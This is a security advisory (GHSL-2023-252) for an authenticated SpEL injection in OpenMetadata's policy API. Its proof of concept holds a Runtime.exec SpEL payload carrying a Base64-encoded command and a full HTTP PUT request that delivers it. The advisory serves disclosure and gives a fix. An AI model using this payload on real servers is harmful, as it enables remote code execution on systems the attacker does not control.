SpEL Injection in PUT /api/v1/policies
(GHSL-2023-252
)
Please note, only authenticated users have access to PUT / POST APIS for /api/v1/policies. Non authenticated users will not be able to access these APIs to exploit the vulnerability
CompiledRule::validateExpression
is also called from PolicyRepository.prepare
@Override
public void prepare(Policy policy, boolean update) {
validateRules(policy);
}
...
public void validateRules(Policy policy) {
List<Rule> rules = policy.getRules();
if (nullOrEmpty(rules)) {
throw new IllegalArgumentException(CatalogExceptionMessage.EMPTY_RULES_IN_POLICY);
}
// Validate all the expressions in the rule
for (Rule rule : rules) {
CompiledRule.validateExpression(rule.getCondition(), Boolean.class);
rule.getResources().sort(String.CASE_INSENSITIVE_ORDER);
rule.getOperations().sort(Comparator.comparing(MetadataOperation::value));
// Remove redundant resources
rule.setResources(filterRedundantResources(rule.getResources()));
// Remove redundant operations
rule.setOperations(filterRedundantOperations(rule.getOperations()));
}
rules.sort(Comparator.comparing(Rule::getName));
}
prepare()
is called from EntityRepository.prepareInternal()
which, in turn, gets called from the EntityResource.createOrUpdate()
:
public Response createOrUpdate(UriInfo uriInfo, SecurityContext securityContext, T entity) {
repository.prepareInternal(entity, true);
// If entity does not exist, this is a create operation, else update operation
ResourceContext<T> resourceContext = getResourceContextByName(entity.getFullyQualifiedName());
MetadataOperation operation = createOrUpdateOperation(resourceContext);
OperationContext operationContext = new OperationContext(entityType, operation);
if (operation == CREATE) {
CreateResourceContext<T> createResourceContext = new CreateResourceContext<>(entityType, entity);
authorizer.authorize(securityContext, operationContext, createResourceContext);
entity = addHref(uriInfo, repository.create(uriInfo, entity));
return new PutResponse<>(Response.Status.CREATED, entity, RestUtil.ENTITY_CREATED).toResponse();
}
authorizer.authorize(securityContext, operationContext, resourceContext);
PutResponse<T> response = repository.createOrUpdate(uriInfo, entity);
addHref(uriInfo, response.getEntity());
return response.toResponse();
}
Note that even though there is an authorization check (authorizer.authorize()
), it gets called after prepareInternal()
gets called and therefore after the SpEL expression has been evaluated.
In order to reach this method, an attacker can send a PUT request to /api/v1/policies
which gets handled by PolicyResource.createOrUpdate()
:
@PUT
@Operation(
operationId = "createOrUpdatePolicy",
summary = "Create or update a policy",
description = "Create a new policy, if it does not exist or update an existing policy.",
responses = {
@ApiResponse(
responseCode = "200",
description = "The policy",
content = @Content(mediaType = "application/json", schema = @Schema(implementation = Policy.class))),
@ApiResponse(responseCode = "400", description = "Bad request")
})
public Response createOrUpdate(
@Context UriInfo uriInfo, @Context SecurityContext securityContext, @Valid CreatePolicy create) {
Policy policy = getPolicy(create, securityContext.getUserPrincipal().getName());
return createOrUpdate(uriInfo, securityContext, policy);
}
This vulnerability was discovered with the help of CodeQL's Expression language injection (Spring) query.
Proof of concept
- Prepare the payload
- Encode the command to be run (eg:
touch /tmp/pwned
) using Base64 (eg: dG91Y2ggL3RtcC9wd25lZA==
)
- Create the SpEL expression to run the system command:
T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode("dG91Y2ggL3RtcC9wd25lZA==")))
- Send the payload using a valid JWT token:
PUT /api/v1/policies HTTP/1.1
Host: localhost:8585
sec-ch-ua: "Chromium";v="119", "Not?A_Brand";v="24"
Authorization: Bearer <non-admin JWT>
accept: application/json
Connection: close
Content-Type: application/json
Content-Length: 367
{"name":"TeamOnlyPolicy","rules":[{"name":"TeamOnlyPolicy-Rule","description":"Deny all the operations on all the resources for all outside the team hierarchy..","effect":"deny","operations":["All"],"resources":["All"],"condition":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode('dG91Y2ggL3RtcC9wd25lZA==')))"}]}
- Verify that a file called
/tmp/pwned
was created in the OpenMetadata server
Impact
This issue may lead to Remote Code Execution by a registered and authenticated user
Remediation
Use SimpleEvaluationContext
to exclude references to Java types, constructors, and bean references.
References
SpEL Injection in
PUT /api/v1/policies
(GHSL-2023-252
)Please note, only authenticated users have access to PUT / POST APIS for /api/v1/policies. Non authenticated users will not be able to access these APIs to exploit the vulnerability
CompiledRule::validateExpression
is also called fromPolicyRepository.prepare
prepare()
is called fromEntityRepository.prepareInternal()
which, in turn, gets called from theEntityResource.createOrUpdate()
:Note that even though there is an authorization check (
authorizer.authorize()
), it gets called afterprepareInternal()
gets called and therefore after the SpEL expression has been evaluated.In order to reach this method, an attacker can send a PUT request to
/api/v1/policies
which gets handled byPolicyResource.createOrUpdate()
:This vulnerability was discovered with the help of CodeQL's Expression language injection (Spring) query.
Proof of concept
touch /tmp/pwned
) using Base64 (eg:dG91Y2ggL3RtcC9wd25lZA==
)T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode("dG91Y2ggL3RtcC9wd25lZA==")))
/tmp/pwned
was created in the OpenMetadata serverImpact
This issue may lead to Remote Code Execution by a registered and authenticated user
Remediation
Use
SimpleEvaluationContext
to exclude references to Java types, constructors, and bean references.References